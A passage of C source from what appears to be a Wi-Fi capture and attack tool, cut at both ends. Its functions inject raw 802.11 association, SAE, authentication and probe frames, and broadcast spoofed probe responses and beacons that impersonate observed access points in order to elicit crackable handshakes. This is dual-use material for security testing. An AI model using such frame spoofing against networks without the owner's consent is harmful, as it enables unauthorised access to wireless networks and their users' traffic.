packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x17] = CS_CCMP; else packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x17] = CS_TKIP; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x1d] = CS_CCMP; if((zeiger->akm &TAK_PSK) == TAK_PSK) packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x23] = AK_PSK; else packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x23] = AK_PSKSHA256; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +ASSOCIATIONREQUESTWPA2_SIZE, "failed to transmit associationrequest"); return; } /*===========================================================================*/ static inline void send_association_req_wpa1(macessidlist_t *zeiger) { static mac_t *macftx; static const uint8_t associationrequestcapa[] = { 0x31, 0x04, 0x05, 0x00 }; #define ASSOCIATIONREQUESTCAPA_SIZE sizeof(associationrequestcapa) static const uint8_t associationrequestwpa1data[] = { /* supported rates */ 0x01, 0x08, 0x02, 0x04, 0x0b, 0x16, 0x0c, 0x12, 0x18, 0x24, /* extended supported rates */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* WPA information (WPA1) */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, /* group cipher */ 0x01, 0x00, /* count */ 0x00, 0x50, 0xf2, 0x02, /* pairwise cipher */ 0x01, 0x00, /* count */ 0x00, 0x50, 0xf2, 0x02, /* AKM */ /* extended capabilites */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x40, /* supported operating classes */ 0x3b, 0x14, 0x51, 0x51, 0x53, 0x54, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f, 0x80, 0x81, 0x82, /* WMM/WME */ 0xdd, 0x07, 0x00, 0x50, 0xf2, 0x02, 0x00, 0x01, 0x00 }; #define ASSOCIATIONREQUESTWPA1_SIZE sizeof(associationrequestwpa1data) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +ASSOCIATIONREQUESTWPA1_SIZE +IETAG_SIZE +zeiger->essidlen); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_REQ; memcpy(macftx->addr1, zeiger->ap, 6); memcpy(macftx->addr2, &mac_myclient, 6); memcpy(macftx->addr3, zeiger->ap, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &associationrequestcapa, ASSOCIATIONREQUESTCAPA_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +1] = zeiger->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +IETAG_SIZE], zeiger->essid, zeiger->essidlen); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE], &associationrequestwpa1data, ASSOCIATIONREQUESTWPA1_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x1b] = CS_TKIP; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x21] = CS_TKIP; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +0x27] = AK_PSK; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE +ASSOCIATIONREQUESTWPA1_SIZE, "failed to transmit associationrequest"); return; } /*===========================================================================*/ static inline void send_association_resp() { static mac_t *macftx; static const uint8_t associationresponsedata[] = { /* Fixed parameters (6 bytes) Fixed parameters (6 bytes) */ 0x11, 0x04, 0x00, 0x00, 0x01, 0xc0, /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40 }; #define ASSOCIATIONRESPONSE_SIZE sizeof(associationresponsedata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONRESPONSE_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_RESP; memcpy(macftx->addr1, macfrx->addr2, 6); memcpy(macftx->addr2, macfrx->addr1, 6); memcpy(macftx->addr3, macfrx->addr1, 6); macftx->duration = 0x013a; macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &associationresponsedata, ASSOCIATIONRESPONSE_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONRESPONSE_SIZE, "failed to transmit associationresponse"); return; } /*===========================================================================*/ /*===========================================================================*/ /* static void send_null(uint8_t *ap) { static mac_t *macftx; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_NULLFUNC; macftx->to_ds = 1; memcpy(macftx->addr1, ap, 6); memcpy(macftx->addr2, &mac_myclient, 6); memcpy(macftx->addr3, ap, 6); macftx->duration = 0x013a; macftx->sequence = mydeauthenticationsequence++ << 4; if(mydeauthenticationsequence >= 4096) mydeauthenticationsequence = 1; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM, "failed to transmit null"); return; } */ /*===========================================================================*/ /*===========================================================================*/ static inline void send_authentication_sae_confirm(uint8_t *macto, uint8_t *macfm) { static mac_t *macftx; static const uint8_t authenticationrequestdata[] = { 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdf, 0xcf, 0x7e, 0x3f, 0x9e, 0xc0, 0x46, 0x68, 0x34, 0x9e, 0x76, 0x07, 0x08, 0x0f, 0xad, 0x78, 0x5a, 0xf8, 0xa4, 0x27, 0x20, 0x2b, 0xd8, 0x13, 0xc1, 0xd1, 0x34, 0x11, 0x54, 0x39, 0x3c, 0x76 }; #define MYAUTHENTICATIONREQUEST_SIZE sizeof(authenticationrequestdata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, macto, 6); memcpy(macftx->addr2, macfm, 6); memcpy(macftx->addr3, macfrx->addr3, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationrequestdata, MYAUTHENTICATIONREQUEST_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE, "failed to transmit sae confirm"); return; } /*===========================================================================*/ static inline void send_authentication_sae_commit(uint8_t *macto, uint8_t *macfm) { static mac_t *macftx; static const uint8_t authenticationrequestdata[] = { 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x13, 0x00, 0x3c, 0x01, 0xa7, 0xb8, 0x9a, 0x46, 0x31, 0x1b, 0xd6, 0x9c, 0x23, 0xef, 0x3a, 0xa5, 0xed, 0xb8, 0xed, 0xbe, 0x68, 0xf8, 0xc6, 0x57, 0x52, 0xa3, 0x6d, 0x8e, 0xe1, 0xee, 0x6e, 0x01, 0xef, 0x21, 0x43, 0xda, 0x71, 0x75, 0xe0, 0xe7, 0x43, 0x38, 0xa6, 0x33, 0xa1, 0x2c, 0xd3, 0x52, 0xcd, 0xbe, 0xd6, 0xd9, 0xc4, 0x19, 0x22, 0xdd, 0xb3, 0x3d, 0xd1, 0xaf, 0x85, 0xb0, 0x81, 0x7d, 0xdb, 0x8d, 0x5d, 0x73, 0xe2, 0x4e, 0x19, 0x24, 0x6b, 0x93, 0x4b, 0x2f, 0xff, 0x7f, 0x15, 0x42, 0x5f, 0x88, 0xe5, 0x56, 0xc8, 0x83, 0xa4, 0x82, 0x8a, 0xa3, 0x12, 0x73, 0x51, 0x02, 0xe9, 0x56, 0xaa, 0xa6 }; #define MYAUTHENTICATIONREQUEST_SIZE sizeof(authenticationrequestdata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, macto, 6); memcpy(macftx->addr2, macfm, 6); memcpy(macftx->addr3, macfrx->addr3, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationrequestdata, MYAUTHENTICATIONREQUEST_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE, "failed to transmit sae commit"); return; } /*===========================================================================*/ static inline void send_authentication_resp_opensystem() { static mac_t *macftx; static const uint8_t authenticationresponsedata[] = { 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 }; #define AUTHENTICATIONRESPONSE_SIZE sizeof(authenticationresponsedata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +AUTHENTICATIONRESPONSE_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, macfrx->addr2, 6); memcpy(macftx->addr2, macfrx->addr1, 6); memcpy(macftx->addr3, macfrx->addr1, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 0; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationresponsedata, AUTHENTICATIONRESPONSE_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +AUTHENTICATIONRESPONSE_SIZE, "failed to transmit authenticationresponse"); return; } /*===========================================================================*/ static inline void send_authentication_req_opensystem(uint8_t *macap) { static mac_t *macftx; static const uint8_t authenticationrequestdata[] = { 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }; #define MYAUTHENTICATIONREQUEST_SIZE sizeof(authenticationrequestdata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, macap, 6); memcpy(macftx->addr2, &mac_myclient, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &authenticationrequestdata, MYAUTHENTICATIONREQUEST_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +MYAUTHENTICATIONREQUEST_SIZE, "failed to transmit authenticationrequest"); return; } /*===========================================================================*/ static inline void send_probe_resp_open() { static mac_t *macftx; static capap_t *capap; const uint8_t proberesponsedata[] = { /* Tag: BC SSID Hotspot*/ 0x00, 0x07, 0x48, 0x6f, 0x74, 0x73, 0x70, 0x6f, 0x74, /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: ERP Information */ 0x2a, 0x01, 0x04, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00 }; #define PROBERESPONSE_SIZE sizeof(proberesponsedata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +ESSID_LEN_MAX +IETAG_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_RESP; memcpy(macftx->addr1, macfrx->addr2, 6); memcpy(macftx->addr2, &mac_myapopen, 6); memcpy(macftx->addr3, &mac_myapopen, 6); macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; capap = (capap_t*)(packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = BEACONINTERVALL; capap->capabilities = 0x401; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE], &proberesponsedata, PROBERESPONSE_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +0x15] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +PROBERESPONSE_SIZE, "failed to transmit proberesponse"); return; } /*===========================================================================*/ static inline void send_probe_resp(uint8_t *client, macessidlist_t *zeigerap) { static mac_t *macftx; static capap_t *capap; static size_t rsnwpa_size; const uint8_t proberesponse_head_data[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: ERP Information */ 0x2a, 0x01, 0x04, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c }; #define PROBERESPONSE_HEAD_SIZE sizeof(proberesponse_head_data) const uint8_t proberesponse_ie_wpapsk[] = { /* Tag: RSN Information WPA1 & WPA2 PSK */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02 }; #define PROBERESPONSE_IE_WPAPSK_SIZE sizeof(proberesponse_ie_wpapsk) const uint8_t proberesponse_ie_wpaentpsk[] = { /* Tag: RSN Information WPA1 & WPA2 PSK */ 0x30, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x02, 0x00, 0x00, 0x0f, 0xac, 0x01, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x1a, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x02, 0x00, 0x00, 0x50, 0xf2, 0x01, 0x00, 0x50, 0xf2, 0x02 }; #define PROBERESPONSE_IE_WPAENTPSK_SIZE sizeof(proberesponse_ie_wpaentpsk) const uint8_t proberesponse_ie_wpaent[] = { /* Tag: RSN Information WPA1 & WPA2 ENT */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x01, 0x00, 0x00, /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x01 }; #define PROBERESPONSE_IE_WPAENT_SIZE sizeof(proberesponse_ie_wpaent) const uint8_t proberesponse_ie_extcap[] = { /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40 }; #define PROBERESPONSE_IE_EXTCAP_SIZE sizeof(proberesponse_ie_extcap) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +ESSID_LEN_MAX +IETAG_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_RESP; memcpy(macftx->addr1, client, 6); memcpy(macftx->addr2, zeigerap->ap, 6); memcpy(macftx->addr3, zeigerap->ap, 6); macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; capap = (capap_t*)(packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = BEACONINTERVALL; capap->capabilities = 0x411; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +1] = zeigerap->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE], zeigerap->essid, zeigerap->essidlen); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen], &proberesponse_head_data, PROBERESPONSE_HEAD_SIZE); if(((zeigerap->akm & TAK_PMKSA) == TAK_PMKSA) || ((zeigerap->akm & TAK_PMKSA256) == TAK_PMKSA256)) { rsnwpa_size = PROBERESPONSE_IE_WPAENT_SIZE; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen +PROBERESPONSE_HEAD_SIZE], &proberesponse_ie_wpaent, PROBERESPONSE_IE_WPAENT_SIZE); } else if(wpaentflag == true) { rsnwpa_size = PROBERESPONSE_IE_WPAENTPSK_SIZE; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen +PROBERESPONSE_HEAD_SIZE], &proberesponse_ie_wpaentpsk, PROBERESPONSE_IE_WPAENTPSK_SIZE); } else { rsnwpa_size = PROBERESPONSE_IE_WPAPSK_SIZE; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen +PROBERESPONSE_HEAD_SIZE], &proberesponse_ie_wpapsk, PROBERESPONSE_IE_WPAPSK_SIZE); } memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen +PROBERESPONSE_HEAD_SIZE +rsnwpa_size], &proberesponse_ie_extcap, PROBERESPONSE_IE_EXTCAP_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen +0x0c] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +zeigerap->essidlen +PROBERESPONSE_HEAD_SIZE +rsnwpa_size +PROBERESPONSE_IE_EXTCAP_SIZE, "failed to transmit proberesponse"); return; } /*===========================================================================*/ static inline void send_proberequest_directed(uint8_t *macap, int essid_len, uint8_t *essid) { static mac_t *macftx; static const uint8_t directedproberequestdata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x92, 0x98, 0xa4, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define DIRECTEDPROBEREQUEST_SIZE sizeof(directedproberequestdata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +ESSID_LEN_MAX +DIRECTEDPROBEREQUEST_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; memcpy(macftx->addr1, macap, 6); memcpy(macftx->addr2, &mac_myprclient, 6); memcpy(macftx->addr3, macap, 6); macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM] = 0; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +1] = essid_len; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE], essid, essid_len); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE +essid_len], &directedproberequestdata, DIRECTEDPROBEREQUEST_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +IETAG_SIZE +essid_len +DIRECTEDPROBEREQUEST_SIZE, "failed to transmit directed proberequest"); return; } /*===========================================================================*/ static inline void send_proberequest_undirected_broadcast() { static mac_t *macftx; static const uint8_t undirectedproberequestdata[] = { 0x00, 0x00, 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x8c, 0x92, 0x98, 0xa4, 0x32, 0x04, 0xb0, 0x48, 0x60, 0x6c }; #define UNDIRECTEDPROBEREQUEST_SIZE sizeof(undirectedproberequestdata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +ESSID_LEN_MAX +UNDIRECTEDPROBEREQUEST_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_REQ; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, &mac_myprclient, 6); memcpy(macftx->addr3, &mac_broadcast, 6); macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &undirectedproberequestdata, UNDIRECTEDPROBEREQUEST_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +UNDIRECTEDPROBEREQUEST_SIZE, "failed to transmit undirected proberequest"); return; } /*===========================================================================*/ static inline void send_beacon_active() { static mac_t *macftx; static capap_t *capap; if(rgbeaconptr >= rglist +RGLIST_MAX) rgbeaconptr = rglist; if(rgbeaconptr->timestamp == 0) rgbeaconptr = rglist; packetoutptr = epbown +EPB_SIZE; if(((rgbeaconptr->akm & TAK_PMKSA) == TAK_PMKSA) || ((rgbeaconptr->akm & TAK_PMKSA256) == TAK_PMKSA256)) memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +reactivebeaconwpaentdatalen +1); else memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +reactivebeacondatalen +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_BEACON; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, rgbeaconptr->ap, 6); memcpy(macftx->addr3, rgbeaconptr->ap, 6); macftx->sequence = myreactivebeaconsequence++ << 4; if(myreactivebeaconsequence >= 4096) myreactivebeaconsequence = 1; capap = (capap_t*)(packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime++; capap->beaconintervall = BEACONINTERVALL; capap->capabilities = 0x411; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +1] = rgbeaconptr->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE], rgbeaconptr->essid, rgbeaconptr->essidlen); if(((rgbeaconptr->akm & TAK_PMKSA) == TAK_PMKSA) || ((rgbeaconptr->akm & TAK_PMKSA256) == TAK_PMKSA256)) { memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconptr->essidlen], &reactivebeaconwpaentdata, reactivebeaconwpaentdatalen); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconptr->essidlen +reactivebeaconwpaentdatachanoffset] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconptr->essidlen +reactivebeaconwpaentdatalen, "failed to transmit internal beacon"); } else { memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconptr->essidlen], &reactivebeacondata, reactivebeacondatalen); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconptr->essidlen +reactivebeacondatachanoffset] = ptrfscanlist->channel; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +rgbeaconptr->essidlen +reactivebeacondatalen, "failed to transmit internal beacon"); } rgbeaconptr++; return; } /*===========================================================================*/ static inline void send_beacon_list_active() { static mac_t *macftx; static capap_t *capap; if(rgbeaconlistptr >= rgbeaconlist +RGLIST_MAX) rgbeaconlistptr = rgbeaconlist; if(rgbeaconlistptr->timestamp == 0) rgbeaconlistptr = rgbeaconlist; packetoutptr = epbown +EPB_SIZE; if(((rgbeaconlistptr->akm & TAK_PMKSA) == TAK_PMKSA) || ((rgbeaconlistptr->akm & TAK_PMKSA256) == TAK_PMKSA256)) memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +reactivebeaconwpaentdatalen +1); else memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +reactivebeacondatalen +1); memcpy(packetoutptr, 